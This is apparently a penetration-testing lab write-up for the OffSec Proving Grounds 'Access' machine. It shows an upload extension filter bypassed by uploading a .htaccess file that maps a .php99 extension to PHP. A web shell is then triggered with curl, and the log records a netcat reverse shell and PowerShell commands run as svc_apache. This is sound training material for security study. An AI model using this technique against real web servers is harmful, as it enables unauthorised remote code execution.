Uploading .htaccess
While the PHP web application on the target ports 80 and 443 supports file upload, the presence of an extension filter made it rather challenging to upload a valid PHP file to get code execution. However, it has been discovered that the file upload functionality accepts uploading a .htaccess file, which can be leveraged for RCE
The .htaccess file is a configuration file used on Apache web servers to control directory-level settings, including security rules. From a security perspective, it can restrict access by IP, enforce HTTPS, set password protection, and configure backend logic such as PHP extension filtering and many more.
Exploit
There could be infinite number of exploits available as context is largely depended upon.
/Practice/Access/3-Exploitation/attachments/{58CDA8AB-C7B7-4520-A062-F18E03694910}.png)
Looking further into it online reveals an article that showcases bypassing extension filter by overwriting the existing .htaccess file
It uses the AddType directive to make the .php16 extension as a valid PHP file
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ cat .htaccess
AddType application/x-httpd-php .php99I will create a .htaccess file that treats the .php99 as a valid PHP extension
/Practice/Access/3-Exploitation/attachments/{BB0AAE13-BF58-4513-8C8A-22F09696DC7C}.png)
Uploading the generated .htaccess file
/Practice/Access/3-Exploitation/attachments/{A57B6A29-6D76-4C99-ADD4-60CC5C6A43B2}.png)
Now I will upload the payload
Notice the extension is set to .php99
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ curl -s http://server.access.offsec/uploads/shell.php99Invoking…
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.171] from (UNKNOWN) [192.168.224.187] 49911
SOCKET: Shell has connected! PID: 2640
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads> powershell -ep bypasas -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\uploads> whoami
access\svc_apache
PS C:\xampp\htdocs\uploads> hostname
SERVER
PS C:\xampp\htdocs\uploads> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.224.187
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.224.254Initial Foothold established to the target system as the svc_apache account via uploading a .htaccess file